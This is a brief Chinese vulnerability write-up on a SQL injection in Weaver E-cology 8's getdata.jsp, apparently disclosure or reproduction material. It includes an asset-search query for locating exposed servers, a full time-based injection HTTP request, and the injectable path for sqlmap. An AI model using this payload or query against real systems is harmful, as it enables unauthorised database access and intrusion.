登录 白背景
源码

泛微E-cology 8 getdata 存在SQL注入漏洞

一、漏洞简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology存在SQL注入漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

二、影响版本

  • 泛微e-cology 8

三、资产测绘

  • hunterapp.name="泛微 e-cology OA"
  • 特征

image.png

四、漏洞复现

GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=WAITFOR+DELAY+%270%3A0%3A5%27 HTTP/1.1
Host: 192.168.31.127:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ecology_JSessionId=abcdTYJZpKflG5NUo9X0y; testBanCookie=test
Upgrade-Insecure-Requests: 1

image.png
sqlmap

/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/xnyqstwhg6wc2d0e